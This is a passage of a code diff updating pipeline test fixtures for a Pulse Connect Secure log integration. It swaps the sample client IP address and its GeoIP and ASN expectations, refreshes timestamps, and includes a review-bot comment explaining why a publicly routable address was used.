+Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM
+Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM
+Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Primary authentication successful for admin/Administrators fr
diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log-expected.json b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log-expected.json
index f2432029e7a..d44ee725ab4 100644
--- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log-expected.json
+++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log-expected.json
@@ -7,24 +7,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)", + "message": "Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)", "tags": [ "preserve_original_event" ], 
@@ -44,26 +47,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612377315Z", - "original": "Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [55.53.160.32] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)", + "ingested": "2021-12-14T14:54:25.429778819Z", + "original": "Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [89.160.20.156] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:40.000+02:00", @@ -82,7 +88,7 @@ "address": "127.0.0.1", "ip": "127.0.0.1" }, - "message": "Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)", + "message": "Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)", "tags": [ "preserve_original_event" ], 
@@ -105,8 +111,8 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-08T13:53:06.612401424Z", - "original": "Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)", + "ingested": "2021-12-14T14:54:25.429781241Z", + "original": "Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:41.000+02:00", @@ -123,22 +129,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Source IP realm restrictions successfully passed for admin/ADMIN_REALM", "tags": [ 
@@ -160,26 +169,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612404648Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM", + "ingested": "2021-12-14T14:54:25.429781841Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", 
@@ -196,22 +208,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "User Limit realm restrictions successfully passed for admin/ADMIN_REALM", "tags": [ 
@@ -233,26 +248,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612407638Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM", + "ingested": "2021-12-14T14:54:25.429782330Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", 
@@ -269,22 +287,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Login failed. Reason: Wrong Password", "tags": [ 
@@ -306,27 +327,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "reason": "Wrong Password", - "ingested": "2021-12-08T13:53:06.612410576Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Login failed. Reason: Wrong Password", + "ingested": "2021-12-14T14:54:25.429782737Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Login failed. Reason: Wrong Password", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", "kind": "event", 
@@ -344,24 +368,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Primary authentication failed for admin/Administrators from 55.53.160.32", + "message": "Primary authentication failed for admin/Administrators from 89.160.20.156", "tags": [ "preserve_original_event" ], 
@@ -381,26 +408,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612413511Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Primary authentication failed for admin/Administrators from 55.53.160.32", + "ingested": "2021-12-14T14:54:25.429783165Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Primary authentication failed for admin/Administrators from 89.160.20.156", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", 
@@ -417,22 +447,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Login failed using auth server Administrators (Local Authentication). Reason: Failed", "tags": [ 
@@ -454,27 +487,30 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { "reason": "Failed", - "ingested": "2021-12-08T13:53:06.612416432Z", - "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[ADMIN_ROLE] - Login failed using auth server Administrators (Local Authentication). Reason: Failed", + "ingested": "2021-12-14T14:54:25.429783583Z", + "original": "Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[ADMIN_ROLE] - Login failed using auth server Administrators (Local Authentication). Reason: Failed", "timezone": "+02:00", "created": "2021-10-19T10:20:57.000+02:00", "kind": "event", 
@@ -492,22 +528,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Source IP realm restrictions successfully passed for admin/ADMIN_REALM", "tags": [ 
@@ -529,26 +568,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612419343Z", - "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM", + "ingested": "2021-12-14T14:54:25.429783989Z", + "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:21:07.000+02:00", 
@@ -565,22 +607,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "User Limit realm restrictions successfully passed for admin/ADMIN_REALM", "tags": [ 
@@ -602,26 +647,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612422269Z", - "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM", + "ingested": "2021-12-14T14:54:25.429784392Z", + "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:21:07.000+02:00", 
@@ -638,22 +686,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Primary authentication successful for admin/Administrators fr", "tags": [ 
@@ -675,26 +726,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:06.612425184Z", - "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Primary authentication successful for admin/Administrators fr", + "ingested": "2021-12-14T14:54:25.429784792Z", + "original": "Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Primary authentication successful for admin/Administrators fr", "category": "network", "timezone": "+02:00", "created": "2021-10-19T10:21:07.000+02:00", diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log index 9750474aeb8..846e75145ec 100644 --- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log +++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log 
@@ -1,7 +1,7 @@
 Oct 19 09:11:09 pcs-node0 1 2021-10-19T09:11:09+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:09 - pcs-node0 - [127.0.0.1] System()[] - No new virus signature list available from 'https://download.pulsesecure.net/software/av/uac/epupdate_hist.xml'.
-Oct 19 09:11:55 pcs-node1 1 2021-10-19T09:11:55+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:55 - pcs-node1 - [55.53.160.32] System(REALM)[] - User Limit realm restrictions successfully passed for /REALM
+Oct 19 09:11:55 pcs-node1 1 2021-10-19T09:11:55+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:55 - pcs-node1 - [89.160.20.156] System(REALM)[] - User Limit realm restrictions successfully passed for /REALM
 Oct 19 09:18:34 pcs-node0 1 2021-10-19T09:18:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:34 - pcs-node0 - [127.0.0.1] System()[] - Integrity Checker Tool: Periodic Scan Started!
 Oct 19 09:18:47 pcs-node0 1 2021-10-19T09:18:47+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:47 - pcs-node0 - [127.0.0.1] System()[] - Integrity Scan Completed: Integrity Scan Results : Matched Files 18773, Newly Detected Files 0, Mismatched Files 0
 Oct 19 09:18:47 pcs-node0 1 2021-10-19T09:18:47+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:47 - pcs-node0 - [127.0.0.1] System()[] - Integrity Checker Tool: Periodic Scan Finished!
-Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured
-Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan.
+Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured
+Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan.
diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log-expected.json b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log-expected.json
index 70c7f3e86be..b45019c86fc 100644
--- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log-expected.json
+++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-system.log-expected.json
@@ -32,7 +32,7 @@
 "ip": "127.0.0.1"
 },
 "event": {
- "ingested": "2021-12-08T13:53:09.222367818Z",
+ "ingested": "2021-12-14T14:54:26.631293953Z",
 "original": "Oct 19 09:11:09 pcs-node0 1 2021-10-19T09:11:09+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:09 - pcs-node0 - [127.0.0.1] System()[] - No new virus signature list available from 'https://download.pulsesecure.net/software/av/uac/epupdate_hist.xml'.",
 "category": "network",
 "timezone": "+02:00",
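Review bot: The new fixture lines switch the sample client address to 89.160.20.156, a publicly routable address (the expected output on this page resolves it to AS29518 "Bredband2 AB" in Linköping) rather than an RFC 5737 documentation address, and nothing in the fixture records why that particular address was chosen. Presumably the geo and AS fields asserted in test-log-system.log-expected.json only match because the GeoIP and ASN lookups used by the pipeline test return a hit for it, so a later contributor who "sanitises" the fixture to 192.0.2.x would silently change those expectations and not just the IP. A one-line note in the data stream's test directory, e.g. `# 89.160.20.156 is used because the pipeline-test GeoIP/ASN lookups resolve it; a documentation-range address would drop the geo/as expectations`, would preserve that intent. The same applies to the test-log-vpn.log hunk further down, where the address also appears inside the message bodies.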
@@ -50,22 +50,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "User Limit realm restrictions successfully passed for /REALM", "tags": [ 
@@ -87,26 +90,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:09.222373494Z", - "original": "Oct 19 09:11:55 pcs-node1 1 2021-10-19T09:11:55+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:55 - pcs-node1 - [55.53.160.32] System(REALM)[] - User Limit realm restrictions successfully passed for /REALM", + "ingested": "2021-12-14T14:54:26.631296826Z", + "original": "Oct 19 09:11:55 pcs-node1 1 2021-10-19T09:11:55+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:55 - pcs-node1 - [89.160.20.156] System(REALM)[] - User Limit realm restrictions successfully passed for /REALM", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:11:55.000+02:00", @@ -148,7 +154,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-08T13:53:09.222376588Z", + "ingested": "2021-12-14T14:54:26.631297230Z", "original": "Oct 19 09:18:34 pcs-node0 1 2021-10-19T09:18:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:34 - pcs-node0 - [127.0.0.1] System()[] - Integrity Checker Tool: Periodic Scan Started!", "category": "network", "timezone": "+02:00", 
@@ -191,7 +197,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-08T13:53:09.222388376Z", + "ingested": "2021-12-14T14:54:26.631297597Z", "original": "Oct 19 09:18:47 pcs-node0 1 2021-10-19T09:18:47+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:47 - pcs-node0 - [127.0.0.1] System()[] - Integrity Scan Completed: Integrity Scan Results : Matched Files 18773, Newly Detected Files 0, Mismatched Files 0", "category": "network", "timezone": "+02:00", @@ -234,7 +240,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-08T13:53:09.222391395Z", + "ingested": "2021-12-14T14:54:26.631297960Z", "original": "Oct 19 09:18:47 pcs-node0 1 2021-10-19T09:18:47+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:18:47 - pcs-node0 - [127.0.0.1] System()[] - Integrity Checker Tool: Periodic Scan Finished!", "category": "network", "timezone": "+02:00", @@ -252,22 +258,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" 